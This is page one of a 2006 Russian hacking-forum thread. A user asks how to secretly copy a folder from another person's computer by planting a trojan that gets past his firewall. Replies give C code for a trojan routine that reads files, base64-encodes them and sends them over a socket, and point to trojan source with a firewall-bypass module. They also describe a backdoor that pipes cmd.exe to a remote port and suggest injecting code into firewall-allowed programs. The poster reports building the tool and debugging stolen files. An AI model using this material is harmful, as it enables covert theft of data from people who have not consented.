Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Слив инфы с чужого компа (https://forum.antichat.xyz/showthread.php?t=16074)

vvs777 18.03.2006 01:26
Слив инфы с чужого компа
 
Надо у одного чудака с компа слить себе папку с важными файлами через интернет (иначе нельзя). Есть возможность внедрить ему прогу, приклеенную к другой. С бекдором можно попробовать, но у него наверняка блокированы порты. Как решить эту задачу? Может, кто уже писал что-то подобное?
Был вариант как-то паковать, кодировать (типа Base64) и передавать постом на бесплатный хостинг.
1. Какие есть еще варианты?
2. Как скрипту (желательно php) получить файл и сохранить на сервере (есть стандартные средства или надо самому все писать?)
3. Если прийдется кодировать/раскодировать в Base64, как это сделать на php?
С заливной частью, думаю, проблем не будет.

Жора 18.03.2006 21:21
большая папка?
нельзя сжать её rar-ом / zip-ом - чтобы один файл, а не папка вышла
и потом выслать архив на ящик.

незнаю что там да как
но вроде ты усложняешь сильно всё.

у него там сервер что-ли? как у него на компе php выполняться будит?

больше инфы давай

drmist 18.03.2006 21:43
Жора
Нормально он все объяснил
vvs777
Я так понимаю, Вас интересуют способы обхода фаервола.
Если у Вас есть навоки в программировании, обратите внимание на эту тему: http://www.security-teams.net/index.php?showtopic=3059.
Там в сорсах траяна можно обнаружить файл FuckFirewall.cpp - это то, что Вам нужно.

По поводу скачивания в Base64 - думаю администрация не сильно обидится, если я немного насорю
Цитата:
void DownloadFile(SOCKET Socket, char* FilePath)
{
HANDLE hFile = CreateFile(FilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
OPEN_EXISTING, 0, 0);

if(hFile == INVALID_HANDLE_VALUE)
{
send(Socket, "- Failed\n", 9, 0);
return;
}

int Size = GetFileSize(hFile, 0);

HANDLE hReadBuff = GlobalAlloc(GMEM_FIXED, 54);
HANDLE hWriteBuff = GlobalAlloc(GMEM_FIXED, 74);
ULONG ddTemp;

wsprintf((char*)hWriteBuff, "+ Success. File size: %d bytes.\n", Size);
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);

for(int i = 0; i < Size / 54 + 1; i++)
{
ReadFile(hFile, hReadBuff, 54, &ddTemp, 0);
B64Encode(hReadBuff, ddTemp, hWriteBuff);
lstrcat((char*)hWriteBuff, "\n");
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
}

GlobalFree(hReadBuff);
GlobalFree(hWriteBuff);
CloseHandle(hFile);
}
Цитата:
// base64.h
HANDLE B64EncodeAlloc(int BuffSize);
_stdcall B64CryptOneBlock(void* Block);
void B64Encode(void* hMem, int MemSize, void* hDest);
Функци base64 кодирования написаны на асме и занимают много метса, я залил их сюда:
https://drmist.ru/download/base64.cpp

Всего этого должно Вам хватить, чтобы собрать несложный троян со всеми необходимыми функциями.
Разумеется, если вы знаете, что делать с исходниками на C++ :(

Жора 18.03.2006 22:02
паренёк нас рассудит...реально вы сильно заморочились.

KEZ 18.03.2006 23:01
До сих пор вижу такие посты - честно скажу, смеюсь.
#FUCK_FIREWALL - действительно тема. Наверное прокатит на Outpost 0.01 demo...

Цитата:
void DownloadFile(SOCKET Socket, char* FilePath)
{
HANDLE hFile = CreateFile(FilePath, GENERIC_READ, FILE_SHARE_READ, NULL,
OPEN_EXISTING, 0, 0);

if(hFile == INVALID_HANDLE_VALUE)
{
send(Socket, "- Failed\n", 9, 0);
return;
}

int Size = GetFileSize(hFile, 0);

HANDLE hReadBuff = GlobalAlloc(GMEM_FIXED, 54);
HANDLE hWriteBuff = GlobalAlloc(GMEM_FIXED, 74);
ULONG ddTemp;

wsprintf((char*)hWriteBuff, "+ Success. File size: %d bytes.\n", Size);
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);

for(int i = 0; i < Size / 54 + 1; i++)
{
ReadFile(hFile, hReadBuff, 54, &ddTemp, 0);
B64Encode(hReadBuff, ddTemp, hWriteBuff);
lstrcat((char*)hWriteBuff, "\n");
send(Socket, (char*)hWriteBuff, lstrlen((char*)hWriteBuff), 0);
}

GlobalFree(hReadBuff);
GlobalFree(hWriteBuff);
CloseHandle(hFile);
}
Код обалденный... Сверх приватный и нужный...

Цитата:
Функци base64 кодирования написаны на асме и занимают много метса, я залил их сюда:
https://drmist.ru/download/base64.cpp
Да, много места, но всеже не столь много чтобы их нельзя было вынуть из OpenSSH для FreeBSD...

B64.CPP
Код:
/*
From openssh-3.1p1.tar.gz\openssh-3.1p1\openbsd-compat\base64.c
*/

/* original header */

/*        $OpenBSD: base64.c,v 1.3 1997/11/08 20:46:55 deraadt Exp $        */

/*
 * Copyright (c) 1996 by Internet Software Consortium.
 *
 * Permission to use, copy, modify, and distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.
 *
 * THE SOFTWARE IS PROVIDED "AS IS" AND INTERNET SOFTWARE CONSORTIUM DISCLAIMS
 * ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL INTERNET SOFTWARE
 * CONSORTIUM BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL
 * DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
 * PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
 * ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
 * SOFTWARE.
 */

/*
 * Portions Copyright (c) 1995 by International Business Machines, Inc.
 *
 * International Business Machines, Inc. (hereinafter called IBM) grants
 * permission under its copyrights to use, copy, modify, and distribute this
 * Software with or without fee, provided that the above copyright notice and
 * all paragraphs of this notice appear in all copies, and that the name of IBM
 * not be used in connection with the marketing of any product incorporating
 * the Software or modifications thereof, without specific, written prior
 * permission.
 *
 * To the extent it has a right to do so, IBM grants an immunity from suit
 * under its patents, if any, for the use, sale or manufacture of products to
 * the extent that such products are used for performing Domain Name System
 * dynamic updates in TCP/IP networks by means of the Software.  No immunity is
 * granted for any product per se or for any other function of any product.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", AND IBM DISCLAIMS ALL WARRANTIES,
 * INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
 * PARTICULAR PURPOSE.  IN NO EVENT SHALL IBM BE LIABLE FOR ANY SPECIAL,
 * DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER ARISING
 * OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE, EVEN
 * IF IBM IS APPRISED OF THE POSSIBILITY OF SUCH DAMAGES.
 */

#include <winsock.h>

//#define Assert(Cond) if (!(Cond)) abort()
#define Assert(Cond) //

static const char Base64[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

static const char Pad64 = '=';

int Base64_Decode( char const *src, u_char *target, size_t targsize )
{
        int tarindex, state, ch;
        char *pos;

        state = 0;
        tarindex = 0;

        while ((ch = *src++) != '\0')
        {
                if (isspace( ch )) continue;

                if (ch == Pad64) break;

                pos = strchr( Base64, ch );
               
                if (pos == 0) return (-1);

                switch (state)
                {
                case 0:
                        if (target)
                        {
                                if (tarindex >= targsize) return (-1);
                                target[tarindex] = (pos - Base64) << 2;
                        }

                        state = 1;
                        break;

                case 1:
                        if (target)
                        {
                                if (tarindex + 1 >= targsize) return (-1);
                                target[tarindex]  |=  (pos - Base64) >> 4;
                                target[tarindex+1]  = ((pos - Base64) & 0x0f)
                                                        << 4 ;
                        }

                        tarindex++;
                        state = 2;
                        break;

                case 2:
                        if (target)
                        {
                                if (tarindex + 1 >= targsize) return (-1);
                                target[tarindex]  |=  (pos - Base64) >> 2;
                                target[tarindex+1]  = ((pos - Base64) & 0x03) << 6;
                        }

                        tarindex++;
                        state = 3;
                        break;

                case 3:
                        if (target)
                        {
                                if (tarindex >= targsize) return (-1);
                                target[tarindex] |= (pos - Base64);
                        }

                        tarindex++;
                        state = 0;
                        break;
                }
        }

        if (ch == Pad64)
        {
                ch = *src++;
                switch (state)
                {
                        case 0:
                        case 1: return (-1);

                        case 2:
                                for (; ch != '\0'; ch = *src++)
                                        if (!isspace( ch )) break;

                                if (ch != Pad64) return (-1);
                                ch = *src++;

                        case 3:

                                for (; ch != '\0'; ch = *src++)
                                if (!isspace( ch )) return (-1);

                                if (target && target[tarindex] != 0) return (-1);
                }
        }
        else
        {
                if (state != 0) return (-1);
        }

        return (tarindex);
}

int Base64_Encode( u_char const *src, size_t srclength, char *target, size_t targsize )
{
        size_t datalength = 0;
        u_char input[3];
        u_char output[4];
        int i;

        while (2 < srclength)
        {
                input[0] = *src++;
                input[1] = *src++;
                input[2] = *src++;
                srclength -= 3;

                output[0] = input[0] >> 2;
                output[1] = ((input[0] & 0x03) << 4) + (input[1] >> 4);
                output[2] = ((input[1] & 0x0f) << 2) + (input[2] >> 6);
                output[3] = input[2] & 0x3f;
                Assert( output[0] < 64 );
                Assert( output[1] < 64 );
                Assert( output[2] < 64 );
                Assert( output[3] < 64 );

                if (datalength + 4 > targsize) return (-1);

                target[datalength++] = Base64[output[0]];
                target[datalength++] = Base64[output[1]];
                target[datalength++] = Base64[output[2]];
                target[datalength++] = Base64[output[3]];
        }
   
        if (0 != srclength)
        {
                input[0] = input[1] = input[2] = '\0';
                for (i = 0; i < srclength; i++) input[i] = *src++;
       
                output[0] = input[0] >> 2;
                output[1] = ((input[0] & 0x03) << 4) + (input[1] >> 4);
                output[2] = ((input[1] & 0x0f) << 2) + (input[2] >> 6);
                Assert( output[0] < 64 );
                Assert( output[1] < 64 );
                Assert( output[2] < 64 );

                if (datalength + 4 > targsize) return (-1);
                target[datalength++] = Base64[output[0]];
                target[datalength++] = Base64[output[1]];

                if (srclength == 1) target[datalength++] = Pad64;
                else
                        target[datalength++] = Base64[output[2]];

                target[datalength++] = Pad64;
        }

        if (datalength >= targsize) return (-1);
        target[datalength] = '\0';

        return (datalength);
}
B64.H
Код:
/*
(C) KEZ
*/

// from openssh-3.1p1.tar.gz\openssh-3.1p1\openbsd-compat\base64.h

#ifndef _BASE64_H_INCLUDED_
#define _BASE64_H_INCLUDED_

// like php style
extern int Base64_Decode( char const *src, u_char *target, size_t targsize );
extern int Base64_Encode( u_char const *src, size_t srclength, char *target, size_t targsize );

#endif // _BASE64_H_INCLUDED_
долой кодинг! даешь кантер страйг!

drmist 19.03.2006 00:01
kez
Меня не покидает чувство, что у Вас ко мне некого рода личная неприязнь )))
Или просто от прероды желание всех кругом опустить.
Предлогаю Вам написать что-нибудь свое и ставте туда хоть компоненты дельфовските, хоть чужой алгоритм (имхо не самой лучшей реализации). Степень приватности и нужности выберете самостоятельно. ;)

vvs777 19.03.2006 01:29
Ой как все запущено...
Во первых я хорошо шарю в делфи но не в сях. За ссылки спасибо, пригодятся.
Я имел в виду что прога посылает файл на хостинг, на котором висит php скрипт.
Че-то меня бейс64 заломал сразу. Буду слать в виде =45=64=97... так легче кодить-декодить. Думал, есть в php стандартная функция как полученный в параметрах файл сохранить на диске. Слышал, что такая есть, но не видел как ее юзать.

drmist 19.03.2006 13:11
vvs777
1) В чем заключается проблема перевода из си в дельфи? могу попробовать объяснить - это не сложно.
2) Зачем =AA=BB=CC...., Если можно AABBCC...? кроме того, php прекрасно декодирует base64 - а данных передаваться будет значительно меньше, чем в hex'е.
3) Вы когда-нибудь заливали что-нить на webfile.ru? Это делается через специальный пост запрос. При этом файл сохраняется на сервере в /tmp, а скрипту передается параметр $_FILE["имя_переменной_в_пост_запр се"]. Это переменная - ассоциати(ви? - как правильно? )) )рованный двумерный массив, $_FILE[..]["size"] - размер файла, $_FILE[..]["error"] - код ошибки, $_FILE[..]["tmp_name"] - имя файла на сервере. Остается только скопировать его из /tmp куда вам нужно.
Что относительно программы - она должна послать специальный пост-запрос (http://rfc.net/rfc2388.html - multipart/form-data). Вобще по ключевым словам "сокеты, multipart/form-data, POST" можно найти хорошее описание на русском.

Но лично я поступил бы так:
написал бекдур, запущенный на 2-х портах:
на первом - перенапревленный ввод/вывод из cmd.exe,
на втором - протокол такой: я шлю полный путь к файлу, троян отсылает его в base64. (а можно и вобще никак не закодированный или даже упакованный)

Написать клиент (если netcat кажется неудобным) не составит труда.

vvs777 20.03.2006 10:19
Я недавно нарвался на пидерский комп кде мой трой не сработал потому, что порты перекрыты и еще и ход из всей сети через 1 ящик.
Сейчас мне это срочно надо сделать до четверга. Ошибки быть не должно.
Прога должна все делать сама. Может и Бейс сделаю.

Ps: Внедпрение в адресное пространство разрешенных файрволами прог - рулит.
Пока проблема - поток в библиотеке прерывается при закрытии программы, а должен завершиться культурно.

vvs777 22.03.2006 15:56
Короче сделал.
Только вот лажа. Текстовые вообще шлются без проблем. Послал xls (EXEL).
Скачал по фтп. Размер совпадает, но не открывается.
Прописал FC /B file.xls file_dn.xls и получил длинный лист
Код:
00000008: 00 20
00000009: 00 20
0000000A: 00 20
0000000B: 00 20
0000000C: 00 20
0000000D: 00 20
0000000E: 00 20
0000000F: 00 20
00000010: 00 20
(Везде где были 00 стало 20)
Как с этим бороться?


Время: 01:19
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице